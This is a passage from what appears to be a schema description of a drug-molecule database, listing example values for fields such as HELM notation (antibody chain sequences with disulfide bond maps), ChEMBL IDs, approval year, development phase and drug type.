# .A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K
# .S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTID
# E4{D.I.Q.M.T.Q.S.P.S.S.V.S.A.S.I.G.D.R.V.T.I.T.C.R.A.S.Q.G.I.D.N.W.L.G.W.Y
# .Q.Q.K.P.G.K.A.P.K.L.L.I.Y.D.A.S.N.L.D.T.G.V.P.S.R.F.S.G.S.G.S.G.T.Y.F.T.L
# .T.I.S.S.L.Q.A.E.D.F.A.V.Y.F.C.Q.Q.A.K.A.F.P.P.T.F.G.G.G.T.K.V.D.I.K.G.T.V
# .A.A.P.S.V.F.I.F.P.P.S.D.E.Q.L.K.S.G.T.A.S.V.V.C.L.L.N.N.F.Y.P.R.E.A.K.V.Q
# .W.K.V.D.N.A.L.Q.S.G.N.S.Q.E.S.V.T.E.Q.D.S.K.D.S.T.Y.S.L.S.S.T.L.T.L.S.K.A
# .D.Y.E.K.H.K.V.Y.A.C.E.V.T.H.Q.G.L.S.S.P.V.T.K.S.F.N.R.G.E.C}$PEPTIDE3,PEP
# TIDE4,219:R3-214:R3|PEPTIDE2,PEPTIDE2,143:R3-199:R3|PEPTIDE1,PEPTIDE1,23:R
# 3-88:R3|PEPTIDE3,PEPTIDE3,366:R3-424:R3|PEPTIDE3,PEPTIDE3,260:R3-320:R3|PE
# PTIDE2,PEPTIDE3,225:R3-225:R3|PEPTIDE2,PEPTIDE2,366:R3-424:R3|PEPTIDE3,PEP
# TIDE3,143:R3-199:R3|PEPTIDE4,PEPTIDE4,134:R3-194:R3|PEPTIDE2,PEPTIDE2,260:
# R3-320:R3|PEPTIDE2,PEPTIDE1,219:R3-214:R3|PEPTIDE1,PEPTIDE1,134:R3-194:R3|
# PEPTIDE2,PEPTIDE2,22:R3-96:R3|PEPTIDE3,PEPTIDE3,22:R3-96:R3|PEPTIDE2,PEPTI
# DE3,228:R3-228:R3|PEPTIDE4,PEPTIDE4,23:R3-88:R3$$$' , 'PEPTIDE1{D.I.Q.M.T.
# Q.S.P.S.S.L.S.A.S.V.G.D.R.V.T.I.T.C.R.A.S.Q.G.I.S.R.W.L.A.W.Y.Q.Q.K.P.E.K.
# A.P.K.S.L.I.Y.A.A.S.S.L.Q.S.G.V.P.S.R.F.S.G.S.G.S.G.T.D.F.T.L.T.I.S.S.L.Q.
# P.E.D.F.A.T.Y.Y.C.Q.Q.Y.N.T.Y.P.R.T.F.G.Q.G.T.K.V.E.I.K.R.T.V.A.A.P.S.V.F.
# I.F.P.P.S.D.E.Q.L.K.S.G.T.A.S.V.V.C.L.L.N.N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.N.A.
# L.Q.S.G.N.S.Q.E.S.V.T.E.Q.D.S.K.D.S.T.Y.S.L.S.S.T.L.T.L.S.K.A.D.Y.E.K.H.K.
# V.Y.A.C.E.V.T.H.Q.G.L.S.S.P.V.T.K.S.F.N.R.G.E.C}|PEPTIDE2{Q.V.Q.L.V.E.S.G.
# G.G.V.V.Q.P.G.R.S.L.R.L.S.C.A.A.S.G.F.T.F.S.S.Y.D.M.H.W.V.R.Q.A.P.G.K.G.L.
# E.W.V.A.V.I.W.Y.D.G.S.N.K.Y.Y.A.D.S.V.K.G.R.F.T.I.S.R.D.N.S.K.N.T.L.Y.L.Q.
# M.N.S.L.R.A.E.D.T.A.V.Y.Y.C.A.R.G.S.G.N.W.G.F.F.D.Y.W.G.Q.G.T.L.V.T.V.S.S.
# A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.
# T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.
# S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.
# C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.
# V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.
# V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.
# K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.D.E.L.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.
# I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.
# K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K.G.S.S}
# |PEPTIDE3{Q.V.Q.L.V.E.S.G.G.G.V.V.Q.P.G.R.S.L.R.L.S.C.A.A.S.G.F.T.F.S.S.Y.
# D.M.H.W.V.R.Q.A.P.G.K.G.L.E.W.V.A.V.I.W.Y.D.G.S.N.K.Y.Y.A.D.S.V.K.G.R.F.T.
# I.S.R.D.N.S.K.N.T.L.Y.L.Q.M.N.S.L.R.A.E.D.T.A.V.Y.Y.C.A.R.G.S.G.N.W.G.F.F.
# D.Y.W.G.Q.G.T.L.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.
# L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.
# L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.K.V.
# E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.
# I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.
# K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.
# A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.D.E.L.T.K.N.Q.V.
# S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.
# D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.
# Q.K.S.L.S.L.S.P.G.K.G.S.S}|PEPTIDE4{D.I.Q.M.T.Q.S.P.S.S.L.S.A.S.V.G.D.R.V.
# T.I.T.C.R.A.S.Q.G.I.S.R.W.L.A.W.Y.Q.Q.K.P.E.K.A.P.K.S.L.I.Y.A.A.S.S.L.Q.S.
# G.V.P.S.R.F.S.G.S.G.S.G.T.D.F.T.L.T.I.S.S.L.Q.P.E.D.F.A.T.Y.Y.C.Q.Q.Y.N.T.
# Y.P.R.T.F.G.Q.G.T.K.V.E.I.K.R.T.V.A.A.P.S.V.F.I.F.P.P.S.D.E.Q.L.K.S.G.T.A.
# S.V.V.C.L.L.N.N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.N.A.L.Q.S.G.N.S.Q.E.S.V.T.E.Q.D.
# S.K.D.S.T.Y.S.L.S.S.T.L.T.L.S.K.A.D.Y.E.K.H.K.V.Y.A.C.E.V.T.H.Q.G.L.S.S.P.
# V.T.K.S.F.N.R.G.E.C}$PEPTIDE1,PEPTIDE1,134:R3-194:R3|PEPTIDE3,PEPTIDE3,263
# :R3-323:R3|PEPTIDE3,PEPTIDE3,22:R3-96:R3|PEPTIDE2,PEPTIDE2,146:R3-202:R3|P
# EPTIDE4,PEPTIDE4,134:R3-194:R3|PEPTIDE2,PEPTIDE2,369:R3-427:R3|PEPTIDE3,PE
# PTIDE4,222:R3-214:R3|PEPTIDE2,PEPTIDE3,228:R3-228:R3|PEPTIDE3,PEPTIDE3,146
# :R3-202:R3|PEPTIDE2,PEPTIDE1,222:R3-214:R3|PEPTIDE2,PEPTIDE2,22:R3-96:R3|P
# EPTIDE2,PEPTIDE2,263:R3-323:R3|PEPTIDE2,PEPTIDE3,231:R3-231:R3|PEPTIDE1,PE
# PTIDE1,23:R3-88:R3|PEPTIDE3,PEPTIDE3,369:R3-427:R3|PEPTIDE4,PEPTIDE4,23:R3
# -88:R3$$$' , 'PEPTIDE1{I.M.D.Q.V.P.F.S.V}$$$$' , 'PEPTIDE1{D.I.Q.L.T.Q.S.P
# .S.S.L.S.A.S.V.G.D.R.V.T.M.T.C.R.A.S.S.S.V.S.Y.I.H.W.F.Q.Q.K.P.G.K.A.P.K.P
# .W.I.Y.A.T.S.N.L.A.S.G.V.P.V.R.F.S.G.S.G.S.G.T.D.Y.T.F.T.I.S.S.L.Q.P.E.D.I
# .A.T.Y.Y.C.Q.Q.W.T.S.N.P.P.T.F.G.G.G.T.K.L.E.I.K.R.T.V.A.A.P.S.V.F.I.F.P.P
# .S.D.E.Q.L.K.S.G.T.A.S.V.V.C.L.L.N.N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.N.A.L.Q.S.G
# .N.S.Q.E.S.V.T.E.Q.D.S.K.D.S.T.Y.S.L.S.S.T.L.T.L.S.K.A.D.Y.E.K.H.K.V.Y.A.C
# .E.V.T.H.Q.G.L.S.S.P.V.T.K.S.F.N.R.G.E.C}|PEPTIDE2{Q.V.Q.L.Q.Q.S.G.A.E.V.K
# .K.P.G.S.S.V.K.V.S.C.K.A.S.G.Y.T.F.T.S.Y.N.M.H.W.V.K.Q.A.P.G.Q.G.L.E.W.I.G
# .A.I.Y.P.G.M.G.D.T.S.Y.N.Q.K.F.K.G.K.A.T.L.T.A.D.E.S.T.N.T.A.Y.M.E.L.S.S.L
# .R.S.E.D.T.A.F.Y.Y.C.A.R.S.T.Y.Y.G.G.D.W.Y.F.D.V.W.G.Q.G.T.T.V.T.V.S.S.A.S
# .T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V
# .S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L
# .G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.R.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P
# .A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S
# .H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S
# .V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G
# .Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.E.E.M.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A
# .V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S
# .R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE3
# {Q.V.Q.L.Q.Q.S.G.A.E.V.K.K.P.G.S.S.V.K.V.S.C.K.A.S.G.Y.T.F.T.S.Y.N.M.H.W.V
# .K.Q.A.P.G.Q.G.L.E.W.I.G.A.I.Y.P.G.M.G.D.T.S.Y.N.Q.K.F.K.G.K.A.T.L.T.A.D.E
# .S.T.N.T.A.Y.M.E.L.S.S.L.R.S.E.D.T.A.F.Y.Y.C.A.R.S.T.Y.Y.G.G.D.W.Y.F.D.V.W
# .G.Q.G.T.T.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C
# .L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S
# .L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.R.V.E.P.K
# .S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R
# .T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R
# .E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P
# .A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.E.E.M.T.K.N.Q.V.S.L.T
# .C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S
# .F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S
# .L.S.L.S.P.G.K}|PEPTIDE4{D.I.Q.L.T.Q.S.P.S.S.L.S.A.S.V.G.D.R.V.T.M.T.C.R.A
# .S.S.S.V.S.Y.I.H.W.F.Q.Q.K.P.G.K.A.P.K.P.W.I.Y.A.T.S.N.L.A.S.G.V.P.V.R.F.S
# .G.S.G.S.G.T.D.Y.T.F.T.I.S.S.L.Q.P.E.D.I.A.T.Y.Y.C.Q.Q.W.T.S.N.P.P.T.F.G.G
# .G.T.K.L.E.I.K.R.T.V.A.A.P.S.V.F.I.F.P.P.S.D.E.Q.L.K.S.G.T.A.S.V.V.C.L.L.N
# .N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.N.A.L.Q.S.G.N.S.Q.E.S.V.T.E.Q.D.S.K.D.S.T.Y.S
# .L.S.S.T.L.T.L.S.K.A.D.Y.E.K.H.K.V.Y.A.C.E.V.T.H.Q.G.L.S.S.P.V.T.K.S.F.N.R
# .G.E.C}$PEPTIDE3,PEPTIDE3,371:R3-429:R3|PEPTIDE2,PEPTIDE1,224:R3-213:R3|PE
# PTIDE3,PEPTIDE3,22:R3-96:R3|PEPTIDE2,PEPTIDE2,148:R3-204:R3|PEPTIDE1,PEPTI
# DE1,133:R3-193:R3|PEPTIDE1,PEPTIDE1,23:R3-87:R3|PEPTIDE4,PEPTIDE4,23:R3-87
# :R3|PEPTIDE3,PEPTIDE3,265:R3-325:R3|PEPTIDE3,PEPTIDE3,148:R3-204:R3|PEPTID
# E4,PEPTIDE4,133:R3-193:R3|PEPTIDE2,PEPTIDE2,265:R3-325:R3|PEPTIDE2,PEPTIDE
# 2,22:R3-96:R3|PEPTIDE3,PEPTIDE4,224:R3-213:R3|PEPTIDE2,PEPTIDE2,371:R3-429
# :R3|PEPTIDE2,PEPTIDE3,230:R3-230:R3|PEPTIDE2,PEPTIDE3,233:R3-233:R3$$$' ,
# 'PEPTIDE1{E.I.V.L.T.Q.S.P.A.T.L.S.L.S.P.G.E.R.A.T.L.S.C.S.A.S.I.S.V.S.Y.M.
# Y.W.Y.Q.Q.K.P.G.Q.A.P.R.L.L.I.Y.D.M.S.N.L.A.S.G.I.P.A.R.F.S.G.S.G.S.G.T.D.
# F.T.L.T.I.S.S.L.E.P.E.D.F.A.V.Y.Y.C.M.Q.W.S.G.Y.P.Y.T.F.G.G.G.T.K.V.E.I.K.
# R.T.V.A.A.P.S.V.F.I.F.P.P.S.D.E.Q.L.K.S.G.T.A.S.V.V.C.L.L.N.N.F.Y.P.R.E.A.
# K.V.Q.W.K.V.D.N.A.L.Q.S.G.N.S.Q.E.S.V.T.E.Q.D.S.K.D.S.T.Y.S.L.S.S.T.L.T.L.
# S.K.A.D.Y.E.K.H.K.V.Y.A.C.E.V.T.H.Q.G.L.S.S.P.V.T.K.S.F.N.R.G.E.C}|PEPTIDE
# 2{E.V.Q.L.V.E.S.G.G.G.L.V.Q.P.G.G.S.L.R.L.S.C.A.A.S.G.F.T.F.S.P.F.A.M.S.W.
# V.R.Q.A.P.G.K.G.L.E.W.V.A.K.I.S.P.G.G.S.W.T.Y.Y.S.D.T.V.T.G.R.F.T.I.S.R.D.
# N.A.K.N.S.L.Y.L.Q.M.N.S.L.R.A.E.D.T.A.V.Y.Y.C.A.R.Q.L.W.G.Y.Y.A.L.D.I.W.G.
# Q.G.T.T.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.
# V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.
# S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.K.V.E.P.K.S.
# C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.
# P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.
# E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.
# P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.D.E.L.T.K.N.Q.V.S.L.T.C.
# L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.
# F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.
# S.L.S.P.G.K}|PEPTIDE3{E.V.Q.L.V.E.S.G.G.G.L.V.Q.P.G.G.S.L.R.L.S.C.A.A.S.G.
# F.T.F.S.P.F.A.M.S.W.V.R.Q.A.P.G.K.G.L.E.W.V.A.K.I.S.P.G.G.S.W.T.Y.Y.S.D.T.
# V.T.G.R.F.T.I.S.R.D.N.A.K.N.S.L.Y.L.Q.M.N.S.L.R.A.E.D.T.A.V.Y.Y.C.A.R.Q.L.
# W.G.Y.Y.A.L.D.I.W.G.Q.G.T.T.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.
# S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.
# V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.
# K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.
# P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.
# V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.
# C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.D.E.
# L.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.
# P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.
# L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE4{E.I.V.L.T.Q.S.P.A.T.L.S.L.S.P.G.
# E.R.A.T.L.S.C.S.A.S.I.S.V.S.Y.M.Y.W.Y.Q.Q.K.P.G.Q.A.P.R.L.L.I.Y.D.M.S.N.L.
# A.S.G.I.P.A.R.F.S.G.S.G.S.G.T.D.F.T.L.T.I.S.S.L.E.P.E.D.F.A.V.Y.Y.C.M.Q.W.
# S.G.Y.P.Y.T.F.G.G.G.T.K.V.E.I.K.R.T.V.A.A.P.S.V.F.I.F.P.P.S.D.E.Q.L.K.S.G.
# T.A.S.V.V.C.L.L.N.N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.N.A.L.Q.S.G.N.S.Q.E.S.V.T.E.
# Q.D.S.K.D.S.T.Y.S.L.S.S.T.L.T.L.S.K.A.D.Y.E.K.H.K.V.Y.A.C.E.V.T.H.Q.G.L.S.
# S.P.V.T.K.S.F.N.R.G.E.C}$PEPTIDE1,PEPTIDE1,23:R3-87:R3|PEPTIDE3,PEPTIDE4,2
# 22:R3-213:R3|PEPTIDE2,PEPTIDE2,22:R3-96:R3|PEPTIDE1,PEPTIDE1,133:R3-193:R3
# |PEPTIDE4,PEPTIDE4,133:R3-193:R3|PEPTIDE2,PEPTIDE2,146:R3-202:R3|PEPTIDE3,
# PEPTIDE3,369:R3-427:R3|PEPTIDE2,PEPTIDE1,222:R3-213:R3|PEPTIDE3,PEPTIDE3,1
# 46:R3-202:R3|PEPTIDE3,PEPTIDE3,22:R3-96:R3|PEPTIDE3,PEPTIDE3,263:R3-323:R3
# |PEPTIDE2,PEPTIDE2,263:R3-323:R3|PEPTIDE2,PEPTIDE3,228:R3-228:R3|PEPTIDE4,
# PEPTIDE4,23:R3-87:R3|PEPTIDE2,PEPTIDE2,369:R3-427:R3|PEPTIDE2,PEPTIDE3,231
# :R3-231:R3$$$'
'molecule_chembl_id': 'TEXT',
# EXAMPLES:
# 'CHEMBL3990010' , 'CHEMBL2109520' , 'CHEMBL3989983' , 'CHEMBL2109674' , 'C
# HEMBL3545192' , 'CHEMBL2108827' , 'CHEMBL1201642' , 'CHEMBL2109648' , 'CHE
# MBL2109626' , 'CHEMBL3989992'
}
},
'black_box': 'BOOLEAN',
# EXAMPLES:
# 'False' , 'False' , 'False' , 'False' , 'False' , 'False' , 'False' , 'False' , 'F
# alse' , 'False'
'chirality': 'NUMERIC',
# EXAMPLES:
# '1' , '1' , '1' , '1' , '1' , '1' , '1' , '1' , '1' , '1'
'development_phase': 'NUMERIC',
# EXAMPLES:
# '0' , '0' , '0' , '4' , '0' , '0' , '0' , '1' , '0' , '0'
'drug_type': 'NUMERIC',
# EXAMPLES:
# '-1' , '-1' , '10' , '-1' , '3' , '-1' , '-1' , '1' , '-1' , '6'
'first_approval': 'NUMERIC',
# EXAMPLES:
# '1982' , '1997' , '1988' , '1998' , '1982' , '1993' , '1994' , '1994' , '2018' , '
# 1990'
'first_in_class': 'BOOLEAN',
# EXAMPLES:
# 'False' , 'False' , 'False' , 'False' , 'False' , 'False' , 'False' , 'False' , 'F
# alse' , 'False'
'helm_notation': 'TEXT',
# EXAMPLES:
# 'PEPTIDE1{D.I.Q.M.T.Q.R.P.D.S.L.S.A.S.V.G.D.R.V.T.M.S.C.K.S.S.Q.S.L.L.N.S.G.D.Q.K.
# N.Y.L.T.W.Y.Q.Q.K.P.G.Q.P.P.K.L.L.I.Y.W.A.S.T.G.E.S.G.V.P.D.R.F.S.G.S.G.S.G.T.D.F.
# T.F.T.I.S.S.L.Q.P.E.D.I.A.T.Y.Y.C.Q.N.D.Y.S.Y.P.W.T.F.G.Q.G.T.K.V.E.I.K.R.T.V.A.A.
# P.S.V.F.I.F.P.P.S.D.E.Q.L.K.S.G.T.A.S.V.V.C.L.L.N.N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.N.A.
# L.Q.S.G.N.S.Q.E.S.V.T.E.Q.D.S.K.D.S.T.Y.S.L.S.S.T.L.T.L.S.K.A.D.Y.E.K.H.K.V.Y.A.C.
# E.V.T.H.Q.G.L.S.S.P.V.T.K.S.F.N.R.G.E.C}|PEPTIDE2{Q.V.Q.L.V.Q.S.G.A.E.V.K.K.P.G.A.
# S.V.K.V.S.C.K.A.S.G.Y.T.F.T.N.S.W.I.G.W.F.R.Q.A.P.G.Q.G.L.E.W.I.G.D.I.Y.P.G.G.G.Y.
# T.N.Y.N.E.I.F.K.G.K.A.T.M.T.A.D.T.S.T.N.T.A.Y.M.E.L.S.S.L.R.S.E.D.T.A.V.Y.Y.C.S.R.
# G.I.P.G.Y.A.M.D.Y.W.G.Q.G.T.L.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.
# T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.
# Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.K.V.E.P.K.S.C.
# D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.
# V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.
# V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.
# R.E.P.Q.V.Y.T.L.P.P.S.R.D.E.L.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.
# G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.
# S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE3{Q.V.Q.L.V.Q.S.G.A.E.V.K.K.P.
# G.A.S.V.K.V.S.C.K.A.S.G.Y.T.F.T.N.S.W.I.G.W.F.R.Q.A.P.G.Q.G.L.E.W.I.G.D.I.Y.P.G.G.
# G.Y.T.N.Y.N.E.I.F.K.G.K.A.T.M.T.A.D.T.S.T.N.T.A.Y.M.E.L.S.S.L.R.S.E.D.T.A.V.Y.Y.C.
# S.R.G.I.P.G.Y.A.M.D.Y.W.G.Q.G.T.L.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.
# G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.
# G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.K.V.E.P.K.
# S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.
# T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.
# R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.
# Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.D.E.L.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.
# S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.
# S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE4{D.I.Q.M.T.Q.R.P.D.S.L.S.
# A.S.V.G.D.R.V.T.M.S.C.K.S.S.Q.S.L.L.N.S.G.D.Q.K.N.Y.L.T.W.Y.Q.Q.K.P.G.Q.P.P.K.L.L.
# I.Y.W.A.S.T.G.E.S.G.V.P.D.R.F.S.G.S.G.S.G.T.D.F.T.F.T.I.S.S.L.Q.P.E.D.I.A.T.Y.Y.C.
# Q.N.D.Y.S.Y.P.W.T.F.G.Q.G.T.K.V.E.I.K.R.T.V.A.A.P.S.V.F.I.F.P.P.S.D.E.Q.L.K.S.G.T.
# A.S.V.V.C.L.L.N.N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.N.A.L.Q.S.G.N.S.Q.E.S.V.T.E.Q.D.S.K.D.
# S.T.Y.S.L.S.S.T.L.T.L.S.K.A.D.Y.E.K.H.K.V.Y.A.C.E.V.T.H.Q.G.L.S.S.P.V.T.K.S.F.N.R.
# G.E.C}$PEPTIDE1,PEPTIDE1,140:R3-200:R3|PEPTIDE3,PEPTIDE3,145:R3-201:R3|PEPTIDE2,PE
# PTIDE2,22:R3-96:R3|PEPTIDE2,PEPTIDE3,230:R3-230:R3|PEPTIDE2,PEPTIDE2,262:R3-322:R3
# |PEPTIDE4,PEPTIDE4,140:R3-200:R3|PEPTIDE3,PEPTIDE4,221:R3-220:R3|PEPTIDE4,PEPTIDE4
